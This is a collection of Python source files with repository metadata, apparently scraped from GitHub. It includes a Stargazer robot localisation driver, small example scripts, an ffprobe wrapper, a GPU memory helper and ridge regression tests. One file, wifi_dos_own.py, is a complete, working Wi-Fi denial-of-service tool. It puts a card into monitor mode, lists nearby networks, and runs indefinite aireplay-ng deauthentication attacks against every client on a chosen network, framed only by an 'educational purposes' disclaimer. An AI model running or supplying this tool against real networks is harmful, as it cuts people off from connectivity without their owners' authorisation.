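# plot_log_population(samples, 'Synthetic durations', 'seconds', 'count (log scale)', 50)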
avg_line_length: 24.6 | max_line_length: 69 | alphanum_fraction: 0.707317
classes: 0 (score 0) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 5 (score 0.020325)

hexsha: c05e9891a35e2b972d23578bd72644f77e52bb11 | size: 12,711 | ext: py | lang: Python
max_stars: src/stargazer/stargazer.py @ magazino/stargazer (head d350959b830b084d31656682721f68b22683ceba) | licenses: ["MIT"] | count: 1 | dates: 2020-02-16T13:18:39.000Z .. 2020-02-16T13:18:39.000Z
max_issues: src/stargazer/stargazer.py @ magazino/stargazer (head d350959b830b084d31656682721f68b22683ceba) | licenses: ["MIT"] | count: 3 | dates: 2017-11-10T14:06:05.000Z .. 2020-04-10T08:27:00.000Z
max_forks: src/stargazer/stargazer.py @ magazino/stargazer (head d350959b830b084d31656682721f68b22683ceba) | licenses: ["MIT"] | count: null | dates: null
content:
"""
Driver class for Hagisonic Stargazer, with no ROS dependencies.
"""
from serial import Serial
from collections import deque
import re
import yaml
import time
import logging
import rospy
import numpy as np
from threading import Thread, Event
from tf import transformations
# STX: char that represents the start of a properly formed message
STX = '~'
# ETX: char that represents the end of a properly formed message
ETX = '`'
# DELIM: char that splits data
DELIM = '|'
# CMD: char that indicates command
CMD = '#'
# CMD: char that indicates command
RESPONSE = '!'
# RESULT: char that indicates that the message contains result data
RESULT = '^'
# NOTIFY: char that indicates a notification message of some kind
NOTIFY = '*'
class StarGazer(object):
    def __init__(self, device, marker_map, callback_global=None, callback_local=None, callback_raw=None, callback_raw_response=None):
"""
Connect to a Hagisonic StarGazer device and receive poses.
device: The device location for the serial connection.
marker_map: dictionary of marker transforms, formatted:
{marker_id: (4,4) matrix}
callback_global: will be called whenever a new pose is received from the
Stargazer, will be called with (n,4,4) matrix of poses
of the location of the Stargazer in the global frame.
These are computed from marker_map.
        callback_local: will be called whenever a new pose is received from the
Stargazer, with a dict: {marker_id: [xyz, angle]}
"""
self.device = device
self.marker_map = marker_map
self.connection = None
# chunk_size: how many characters to read from the serial bus in
# between checking the buffer for the STX/ETX characters
self._chunk_size = 80
self._callback_global = callback_global
self._callback_local = callback_local
self._callback_raw = callback_raw
        self._callback_raw_response = callback_raw_response
self._stopped = Event()
self._thread = None
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
if self.is_connected:
self.disconnect()
@property
def is_connected(self):
"""
Returns whether the driver is currently connected to a serial port.
"""
return self.connection is not None
def connect(self):
"""
Connect to the StarGazer over the specified RS-232 port.
"""
if self.is_connected:
self.disconnect()
self.connection = Serial(port=self.device, baudrate=115200, timeout=1.0)
if self.connection is None:
return False
return True
def disconnect(self):
"""
Disconnects from the StarGazer and closes the RS-232 port.
"""
if self.is_connected:
self.connection.close()
self.connection = None
if self.connection is None:
return True
return False
@property
def is_streaming(self):
"""
Returns whether the driver is currently streaming pose data.
"""
return self._thread is not None
def start_streaming(self):
"""
Begin streaming pose data from the StarGazer.
"""
assert self.is_connected and not self.is_streaming
success = self._send_command('CalcStart')
if success:
self._thread = Thread(target=self._read, args=()).start()
return success
def stop_streaming(self):
"""
Stop streaming pose data from the StarGazer.
"""
assert self.is_connected
if self.is_streaming:
self._stopped.set()
self._thread.join()
success = self._send_command('CalcStop')
return success
def reset_parameters(self):
"""
Stop streaming pose data from the StarGazer.
"""
assert self.is_connected and not self.is_streaming
success = self._send_command('Reset')
return success
def set_parameter(self, name, value):
"""
Set a StarGazer configuration parameter.
This function can only be called while the StarGazer is
connected, but not streaming.
Arguments
---------
name: string name of the parameter to set
value: string value of the parameter to set
Example
-------
set_parameter('MarkType', 'HLD1L')
"""
assert self.is_connected and not self.is_streaming
success = self._send_command(name, value)
return success
def get_parameter(self, name):
pass
def _send_command(self, *args):
"""
Send a command to the StarGazer.
Arguments
---------
command: string, or list. If string of single command, send just that.
if list, reformat to add delimiter character
Example
-------
_send_command('CalcStop')
_send_command('MarkType', 'HLD1L')
"""
success = True
delimited = DELIM.join(str(i) for i in args)
if 'SetEnd' in delimited:
delimited = 'SetEnd'
command_str = STX + CMD + delimited + ETX
rospy.loginfo('Sending command to StarGazer: %s', command_str)
# The StarGazer requires a 50 ms delay between each byte.
for ch in command_str:
self.connection.write(ch)
time.sleep(0.05)
response_expected = STX + RESPONSE + delimited + ETX
success = self._read_response(response_expected)
if success and ('SetEnd' in response_expected):
response_expected = STX + RESPONSE + 'ParameterUpdate' + ETX
time.sleep(1.0)
success = self._read_response(response_expected)
if(success):
rospy.loginfo('Parameters update successful')
return success
def _read_response(self, response_expected):
success = True
try:
response_actual = self.connection.read(len(response_expected))
        except Exception as e:
            rospy.logwarn(str(e))
            success = False
            return success
# Scan for more incoming characters until we get a read timeout.
# (This is useful if there is still some incoming data from previous
# commands in intermediate serial buffers.)
while response_actual[-len(response_expected):] != response_expected:
c = None
try:
c = self.connection.read()
except Exception as e:
rospy.logwarn(str(e))
return success
if c:
# Add new characters to the response string.
response_actual += c
else:
rospy.logwarn('Received invalid response {%s} expected "{%s}'% \
(response_actual, response_expected))
success = False
break
'''
# If we run out of characters and still don't match, report
# the invalid response as an exception.
raise Exception(
'Command "{:s}" received invalid response "{:s}"; '
'expected "{:s}".'
.format(command_str, response_actual, response_expected)
)
'''
        print(response_actual)
        if self._callback_raw_response:
            self._callback_raw_response(response_actual)
return success
def _read(self):
"""
Read from the serial connection to the StarGazer, process buffer,
then execute callbacks.
"""
# Compute a regular expression that returns the last valid
# message in a StarGazer stream.
msg_pattern = ('.*' + STX + '(?P<type>.)(?P<payload>.+)' + ETX +
'(?P<remainder>.*)$')
msg_matcher = re.compile(msg_pattern)
# Compute a regular expression that converts a StarGazer message
# into a list of tuples containing parsed groups.
delimiter = '\\' + DELIM
number = '[\d\+\-\.]'
tag_pattern = (r'(?P<id>\d+)' + delimiter +
r'(?P<yaw>' + number + '+)' + delimiter +
r'(?P<x>' + number + '+)' + delimiter +
r'(?P<y>' + number + '+)' + delimiter +
r'(?P<z>' + number + '+)')
tag_matcher = re.compile(tag_pattern)
def process_buffer(message_buffer):
"""
Looks at current message_buffer string for STX and ETX chars.
Proper behavior is to process string found between STX/ETX for poses
and remove everything in the buffer up the last observed ETX.
Valid readings:
~^148|-175.91|+98.74|+7.10|182.39`
~^248|-176.67|+98.38|+8.39|181.91|370|-178.41|-37.05|+8.97|179.51`
No valid readings:
~*DeadZone`
"""
# Look for a matching message, return the buffer if none are found.
message = msg_matcher.match(message_buffer)
if not message:
return message_buffer
if message.group('type') == RESULT:
markers = tag_matcher.finditer(message.group('payload'))
local_poses = {}
raw_poses = []
for marker in markers:
# Parse pose information for this marker.
_id = marker.group('id')
yaw = -np.radians(float(marker.group('yaw')))
x = 0.01 * float(marker.group('x'))
y = 0.01 * float(marker.group('y'))
# Note: this axis is negated.
z = 0.0#-0.01 * float(marker.group('z'))
raw_pose = [_id,x,y,0,-yaw]
raw_poses.append(raw_pose)
# Convert the pose to a transform and store it by ID.
marker_to_stargazer = fourdof_to_matrix((x, y, z), yaw)
local_poses[_id] = np.linalg.inv(marker_to_stargazer)
if self._callback_raw:
self._callback_raw(raw_poses)
if self._callback_local:
self._callback_local(local_poses)
if self._callback_global:
global_poses, unknown_ids = local_to_global(self.marker_map,
local_poses)
self._callback_global(global_poses, unknown_ids)
elif message.group('type') == NOTIFY:
# TODO: Report deadzone messages in here!
pass
else:
pass
# Return the rest of the message buffer.
return message.group('remainder')
rospy.loginfo('Entering read loop.')
message_buffer = ''
while not self._stopped.is_set() and self.connection:
try:
message_buffer += self.connection.read(self._chunk_size)
message_buffer = process_buffer(message_buffer)
except Exception as e:
rospy.logwarn('Error processing current buffer: %s (content: "%s")',
str(e), message_buffer
)
message_buffer = ''
break # For debugging purposes.
rospy.loginfo('Exited read loop.')
def close(self):
self._stopped.set()
self._send_command('CalcStop')
self.connection.close()
def local_to_global(marker_map, local_poses):
"""
Transform local marker coordinates to map coordinates.
"""
global_poses = dict()
unknown_ids = set()
for _id, pose in local_poses.iteritems():
if _id in marker_map:
marker_to_map = marker_map[_id]
local_to_marker = np.linalg.inv(pose)
local_to_map = np.dot(marker_to_map, local_to_marker)
global_poses[_id] = local_to_map
else:
unknown_ids.add(_id)
return global_poses, unknown_ids
def fourdof_to_matrix(translation, yaw):
"""
Convert from a Cartesian translation and yaw to a homogeneous transform.
"""
T = transformations.rotation_matrix(yaw, [0,0,1])
T[0:3,3] = translation
return T
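# A worked example with hypothetical values: a translation of (1.0, 0.5, 0.0)
# metres and a 90-degree yaw about z; the translation lands in the last column.
# T = fourdof_to_matrix((1.0, 0.5, 0.0), np.pi / 2)
# T[0:3, 3]  # -> array([1. , 0.5, 0. ])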
def _callback_dummy(data):
return
def _callback_print(data):
print(data)
avg_line_length: 33.274869 | max_line_length: 131 | alphanum_fraction: 0.567855
classes: 11,119 (score 0.874754) | generators: 0 (score 0) | decorators: 350 (score 0.027535) | async_functions: 0 (score 0) | documentation: 5,010 (score 0.394147)

hexsha: c06110be42afdd7912f3230ce0bb253e62f06b14 | size: 107 | ext: py | lang: Python
max_stars: example.py @ karishmashuklaa/flatifyLists (head af9c1cfc45c29756ff9e285dba65f3b4909dabab) | licenses: ["MIT"] | count: null | dates: null
max_issues: example.py @ karishmashuklaa/flatifyLists (head af9c1cfc45c29756ff9e285dba65f3b4909dabab) | licenses: ["MIT"] | count: null | dates: null
max_forks: example.py @ karishmashuklaa/flatifyLists (head af9c1cfc45c29756ff9e285dba65f3b4909dabab) | licenses: ["MIT"] | count: null | dates: null
content:
from flatifylists import flatifyList
example = [[[1,2], [3,[4,[5],6],7],8,9]]
print(flatifyList(example))
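# Expected output, assuming flatifyList fully flattens arbitrary nesting:
# [1, 2, 3, 4, 5, 6, 7, 8, 9]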
avg_line_length: 21.4 | max_line_length: 40 | alphanum_fraction: 0.672897
classes: 0 (score 0) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 0 (score 0)

hexsha: c0619baa743809ca6b4e84726f67140652acbe34 | size: 834 | ext: py | lang: Python
max_stars: pympeg/_probe.py @ AP-Atul/pympeg (head 26d18883d528ce73c09982f61440d170661165ae) | licenses: ["Unlicense"] | count: 5 | dates: 2021-01-18T03:19:32.000Z .. 2021-04-27T06:58:41.000Z
max_issues: pympeg/_probe.py @ AP-Atul/pympeg (head 26d18883d528ce73c09982f61440d170661165ae) | licenses: ["Unlicense"] | count: null | dates: null
max_forks: pympeg/_probe.py @ AP-Atul/pympeg (head 26d18883d528ce73c09982f61440d170661165ae) | licenses: ["Unlicense"] | count: null | dates: null
content:
import os
import json
import subprocess
from ._exceptions import ProbeException
__all__ = ['probe']
def probe(filename, cmd='ffprobe', timeout=None):
"""Runs the ffprobe on the given file and outputs in json format """
if not os.path.isfile(filename):
raise FileExistsError(f"Input file {filename} does not exists.")
args = [cmd, '-show_format', '-show_streams', '-of', 'json']
args += [filename]
p = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
communicate_kwargs = dict()
if timeout is not None:
communicate_kwargs['timeout'] = timeout
out, err = p.communicate(**communicate_kwargs)
if p.returncode != 0:
raise ProbeException('ffprobe', out, err)
return json.loads(out.decode('utf-8'))
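# A hedged usage sketch (the filename is illustrative). ffprobe's JSON output
# exposes container-level metadata under the 'format' key:
# info = probe('input.mp4')
# duration = float(info['format']['duration'])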
avg_line_length: 24.529412 | max_line_length: 72 | alphanum_fraction: 0.640288
classes: 0 (score 0) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 190 (score 0.227818)

hexsha: c063c02a86fbd38bc9d19422a9222b6d2583e226 | size: 252 | ext: py | lang: Python
max_stars: example/func_doc.py @ tinashime/Python27 (head b632918c7368a9bcfc5af8353e136247d954fb5e) | licenses: ["bzip2-1.0.6"] | count: null | dates: null
max_issues: example/func_doc.py @ tinashime/Python27 (head b632918c7368a9bcfc5af8353e136247d954fb5e) | licenses: ["bzip2-1.0.6"] | count: null | dates: null
max_forks: example/func_doc.py @ tinashime/Python27 (head b632918c7368a9bcfc5af8353e136247d954fb5e) | licenses: ["bzip2-1.0.6"] | count: null | dates: null
content:
def printMax(x,y):
'''prints the maximum of two numbers.
The two values must be integers.'''
x = int(x)
y = int(y)
if x > y:
        print x,'is maximum'
else:
print y,'is maximum'
printMax(3,5)
print printMax.__doc__
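# Expected output of the two statements above (docstring whitespace
# reproduced approximately):
#   5 is maximum
#   prints the maximum of two numbers.
#       The two values must be integers.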
avg_line_length: 18 | max_line_length: 41 | alphanum_fraction: 0.575397
classes: 0 (score 0) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 102 (score 0.404762)

hexsha: c064dd6092bc97df5e3082e40d12bf519228fd1e | size: 16,602 | ext: py | lang: Python
max_stars: wifi_dos_own.py @ Mr-Cracker-Pro/red-python-scripts (head 5bead83038aadf53fc868fb9a786cb37824b18eb) | licenses: ["MIT"] | count: 1,353 | dates: 2021-01-07T17:12:01.000Z .. 2022-03-31T21:30:38.000Z
max_issues: wifi_dos_own.py @ deepahir/red-python-scripts (head 5deef698bf505de30735120e7c3bab34707ad32c) | licenses: ["MIT"] | count: 29 | dates: 2021-01-30T21:12:16.000Z .. 2022-03-04T15:06:12.000Z
max_forks: wifi_dos_own.py @ deepahir/red-python-scripts (head 5deef698bf505de30735120e7c3bab34707ad32c) | licenses: ["MIT"] | count: 1,238 | dates: 2021-01-07T17:05:18.000Z .. 2022-03-31T23:25:04.000Z
content:
#!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
#!/usr/bin/python3
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
# We use the subprocess.run to run the "sudo iw dev" command we'd normally run to find the network interfaces.
result = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
    """This function needs the network interface controller name to put it into monitor mode.
    Argument: Network Controller Name"""
    # Put the WiFi controller into monitor mode, using the name passed in
    # rather than a global. This is one way to do it; you can also use iwconfig, or airmon-ng.
    subprocess.run(["ip", "link", "set", controller_name, "down"])
    # Killing conflicting processes makes sure that nothing interferes with putting the controller into monitor mode.
    subprocess.run(["airmon-ng", "check", "kill"])
    # Put the WiFi nic in monitor mode.
    subprocess.run(["iw", controller_name, "set", "monitor", "none"])
    # Bring the WiFi controller back online.
    subprocess.run(["ip", "link", "set", controller_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
# Bands b and g are 2.4Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif choice == "1":
# Band a is for 5Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
# Will use bands a, b and g (actually band n). Checks full spectrum.
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We copy any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
"""SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
ARGUMENTS: wifi interface name
"""
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
def get_clients(hackbssid, hackchannel, wifi_name):
subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
# We are using aireplay-ng to send a deauth packet. 0 means it will send it indefinitely. -a is used to specify the MAC address of the target router. -c is used to specify the mac we want to send the deauth packet.
# Then we also need to specify the interface
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
# Regular Expressions to be used.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
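# For reference, both patterns match typical input (illustrative strings):
# mac_address_regex.findall("00:11:22:33:44:55")  # -> ['00:11:22:33:44:55']
# wlan_code.findall("Interface wlan0")            # -> ['wlan0']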
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of David Bombal, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
# Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
macs_not_to_kick_off = mac_address_regex.findall(macs)
# We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
# If you entered a valid MAC Address the program flow will continue and break out of the while loop.
if len(macs_not_to_kick_off) > 0:
break
print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
# Check if the choice exists. If it doesn't it asks the user to try again.
# We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
band_choice = input("Please select the bands you want to scan from the list above: ")
try:
if wifi_controller_bands[int(band_choice)]:
# Since the choice exists and is an integer we can cast band choice as an integer.
band_choice = int(band_choice)
break
except:
print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
# If no networks interface controllers connected to your computer the program will exit.
print("Please connect a network interface controller and try again!")
exit()
# Select the network interface controller you want to put into monitor mode.
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
try:
if network_controllers[int(controller_choice)]:
break
except:
print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
set_monitor_mode(wifi_name)
# Monitor the selected wifi band(s).
set_band_to_monitor(band_choice)
# Print WiFi Menu
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
get_clients(hackbssid, hackchannel, wifi_name)
# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
while True:
count = 0
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
print("Running")
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
pass
# We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
elif row["Station MAC"] in macs_not_to_kick_off:
pass
else:
# Add all the active MAC Addresses.
active_clients.add(row["Station MAC"])
print("Station MAC |")
print("______________________|")
for item in active_clients:
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{item}")
# Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
if item not in threads_started:
# It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
threads_started.append(item)
                # We run the deauth_attack function in the thread with the arguments hackbssid, item and wifi_name; we also specify it as a background daemon thread.
# A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
t.start()
except KeyboardInterrupt:
print("\nStopping Deauth")
# Set the network interface controller back into managed mode and restart network services.
set_into_managed_mode(wifi_name)
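# Illustrative only: a self-contained sketch of the csv.DictReader pattern used in the
# loop above. The file name and the header-skipping threshold are assumptions, not part
# of the original script; airodump-ng's client CSV has no header row, so we supply the
# field names ourselves.
def _dictreader_sketch(csv_path="clients-01.csv"):
    fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
    with open(csv_path) as csv_h:
        for index, row in enumerate(csv.DictReader(csv_h, fieldnames=fieldnames)):
            if index >= 5:  # skip the access-point section at the top of the file
                print(row["Station MAC"])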
| 50.1571
| 219
| 0.634743
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9,946
| 0.599084
|
c0668c5403b0ea8527a26c2985cb37df3eafd6d0
| 597
|
py
|
Python
|
lightwood/mixers/helpers/debugging.py
|
ritwik12/lightwood
|
7975688355fba8b0f8349dd55a1b6cb625c3efd0
|
[
"MIT"
] | null | null | null |
lightwood/mixers/helpers/debugging.py
|
ritwik12/lightwood
|
7975688355fba8b0f8349dd55a1b6cb625c3efd0
|
[
"MIT"
] | null | null | null |
lightwood/mixers/helpers/debugging.py
|
ritwik12/lightwood
|
7975688355fba8b0f8349dd55a1b6cb625c3efd0
|
[
"MIT"
] | null | null | null |
import subprocess
def get_gpu_memory_map():
'''
Query nvidia-smi for per-device GPU memory usage.
Keys are device ids as integers.
Values are memory usage as integers in MB.
'''
result = subprocess.check_output(
[
'nvidia-smi', '--query-gpu=memory.used',
'--format=csv,nounits,noheader'
], encoding='utf-8')
# Convert lines into a dictionary
gpu_memory = [int(x) for x in result.strip().split('\n')]
gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))
return gpu_memory_map
def print_gpuutil_status():
import GPUtil
GPUtil.showUtilization()
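# Minimal usage sketch (an assumption, not part of the original module; requires an
# NVIDIA GPU and nvidia-smi on the PATH):
if __name__ == '__main__':
    for device_id, used_mb in get_gpu_memory_map().items():
        print('GPU %d: %d MB used' % (device_id, used_mb))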
| 27.136364
| 66
| 0.631491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 215
| 0.360134
|
c066f48fe0ef8d58aa4b19024e03a53d9943e528
| 2,010
|
py
|
Python
|
optimization/prac1/tests/test_ridge.py
|
shaandesai1/AIMS
|
fee0be214b393af2184d565eb1e9aebb4eb6eeec
|
[
"MIT"
] | null | null | null |
optimization/prac1/tests/test_ridge.py
|
shaandesai1/AIMS
|
fee0be214b393af2184d565eb1e9aebb4eb6eeec
|
[
"MIT"
] | null | null | null |
optimization/prac1/tests/test_ridge.py
|
shaandesai1/AIMS
|
fee0be214b393af2184d565eb1e9aebb4eb6eeec
|
[
"MIT"
] | null | null | null |
import unittest
from sys import argv
import numpy as np
import torch
from objective.ridge import Ridge, Ridge_ClosedForm, Ridge_Gradient
from .utils import Container, assert_all_close, assert_all_close_dict
def _init_ridge(cls):
np.random.seed(1234)
torch.manual_seed(1234)
n_features = 3
n_samples = 5
mu = 0.02
cls.hparams = Container(n_features=n_features,
n_samples=n_samples,
mu=mu)
cls.w = torch.randn(n_features, 1, requires_grad=True)
cls.x = torch.randn(n_samples, n_features)
cls.y = torch.randn(n_samples)
class TestObj_Ridge_ClosedForm(unittest.TestCase):
def setUp(self):
_init_ridge(self)
self.obj = Ridge_ClosedForm(self.hparams)
def test_error(self):
error_test = self.obj.task_error(self.w, self.x, self.y)
error_ref = torch.tensor(1.3251)
assert_all_close(error_test, error_ref, "task_error returned value")
def test_oracle(self):
oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
oracle_info_ref = {
'sol': torch.tensor([[-0.2297], [-0.7944], [-0.5806]]),
'obj': torch.tensor(1.3370)}
assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
class TestObj_Ridge_Gradient(unittest.TestCase):
def setUp(self):
_init_ridge(self)
self.obj = Ridge_Gradient(self.hparams)
def test_error(self):
error_test = self.obj.task_error(self.w, self.x, self.y)
error_ref = torch.tensor(1.3251)
assert_all_close(error_test, error_ref, "task_error returned value")
def test_oracle(self):
oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
oracle_info_ref = {
'dw': torch.tensor([[0.7323], [1.4816], [-0.3771]]),
'obj': torch.tensor(1.3370)}
assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
if __name__ == '__main__':
unittest.main(argv=argv)
| 30.923077
| 79
| 0.656716
| 1,331
| 0.662189
| 0
| 0
| 0
| 0
| 0
| 0
| 109
| 0.054229
|
c0670360313a88da7a90013e4063946791935b2d
| 11,795
|
py
|
Python
|
app/parking/views.py
|
zollf/CITS3200
|
95fb7569dad325c057e441cd7265d3e85735c058
|
[
"CC0-1.0"
] | null | null | null |
app/parking/views.py
|
zollf/CITS3200
|
95fb7569dad325c057e441cd7265d3e85735c058
|
[
"CC0-1.0"
] | null | null | null |
app/parking/views.py
|
zollf/CITS3200
|
95fb7569dad325c057e441cd7265d3e85735c058
|
[
"CC0-1.0"
] | null | null | null |
